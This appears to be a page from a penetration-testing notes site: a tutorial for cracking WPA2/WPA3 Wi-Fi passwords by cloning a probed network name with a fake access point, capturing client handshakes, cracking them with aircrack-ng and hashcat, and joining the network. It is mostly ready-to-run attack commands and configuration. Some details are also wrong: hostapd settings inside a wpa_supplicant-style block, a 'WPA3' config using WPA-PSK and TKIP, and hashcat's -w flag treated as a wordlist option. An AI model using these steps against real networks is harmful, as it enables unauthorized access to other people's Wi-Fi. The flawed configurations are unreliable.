WPA2 & WPA3-APLess

Cracking WPA2/WPA3 Passwords Using a Fake Access Point

In this tutorial, we'll demonstrate how to set up a fake access point (AP), capture WPA2/WPA3 handshakes, and crack the passwords using tools like aircrack-ng and hashcat. We will also configure the AP to use WPA2 or WPA3 encryption.

Prerequisites

Ensure you have the following:

A wireless card that supports monitor mode.
The necessary tools: airmon-ng, airodump-ng, hostapd, aircrack-ng, hashcat, hcxpcapngtool, and a wordlist (e.g., /usr/share/wordlists/rockyou.txt).

Step-by-Step Process

1. Start Interface in Monitor Mode and Kill Unwanted Services

Start by disabling any services that might interfere with your network scanning, then put your wireless interface into monitor mode:

airmon-ng check kill && airmon-ng start wlan0

airmon-ng check kill: Stops interfering processes.
airmon-ng start wlan0: Puts the wireless interface wlan0 into monitor mode (wlan0mon).

2. Scan for Networks

Next, scan for nearby wireless networks and capture data about them:

sudo airodump-ng wlan0mon -w capture1

airodump-ng: Scans for nearby networks.
-w capture1: Saves the capture data into a file named capture1.cap.

This command will display a list of nearby networks, and we will use this data to create a fake access point.

3. Create AP Based on Network Probes

Using the data from the captured networks, create a wpa_supplicant configuration file to set up your fake AP. You can use either WPA2 or WPA3 configurations:

Create your WPA Supplicant file:

# We're creating the files
touch wpa2.conf wpa3.conf

WPA2 Configuration:

network{
    interface=wlan1 #the other wireless interface available to us
    hw_mode=g
    channel=1
    driver=nl80211 #as used by all Linux OSs
    ssid=Name #name of the network
    auth_algs=1
    wpa=2
    wpa_key_mgmt=WPA-PSK
    wpa_passphrase=abc123123 #can be anything, but ensure it is minimum 8 in length
}

WPA3 Configuration:

network{
    interface=wlan0
    ssid=Mostar
    channel=1
    hw_mode=g
    ieee80211n=1
    wpa=3
    wpa_key_mgmt=WPA-PSK
    wpa_passphrase=ANYPASSWORD
    wpa_pairwise=TKIP
    rsn_pairwise=TKIP CCMP
    mana_wpaout=/home/kali/file.hccapx
}

4. Start the Fake Access Point

Use hostapd to start the fake access point with the configuration file you created:

hostapd -d <filename>.conf

Replace <filename> with the name of the configuration file you created.

Once the AP is started, the handshake should be captured on the airodump-ng screen.

5. Crack the Captured Handshake

After capturing the handshake, you can attempt to crack the password using aircrack-ng or hashcat.

Cracking with aircrack-ng:

sudo aircrack-ng <output_file>.cap -e <ESSID>
sudo aircrack-ng <output_file>.cap -e <ESSID> -w /usr/share/wordlists/rockyou.txt

<output_file>.cap: The capture file containing the handshake.
<ESSID>: The SSID of the target network.
-w /usr/share/wordlists/rockyou.txt: Specifies the wordlist to use for the dictionary attack.

Cracking with hashcat:

Convert the capture file to the hashcat format:

hcxpcapngtool -o <output_file>.hc22000 <output_file>.cap

Run hashcat to crack the password:
```
hashcat -m 22000 <output_file>.hc22000 -w /usr/share/wordlists/rockyou.txt
```
- -m 22000: Specifies the hash type (WPA/WPA2).
- <output_file>.hc22000: The converted file in hashcat format.

Connect to the Wireless Network:

wpa_supplicant -c wpa.conf

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

6. Conclusion

After following these steps, you've successfully set up a fake access point, captured a WPA2/WPA3 handshake, and cracked the password using aircrack-ng or hashcat. These methods simulate real-world attacks to test the strength of wireless networks.

PreviousWPA2 & WPA3 Enterprise Networks NextReverse Engineering

Last updated 3 months ago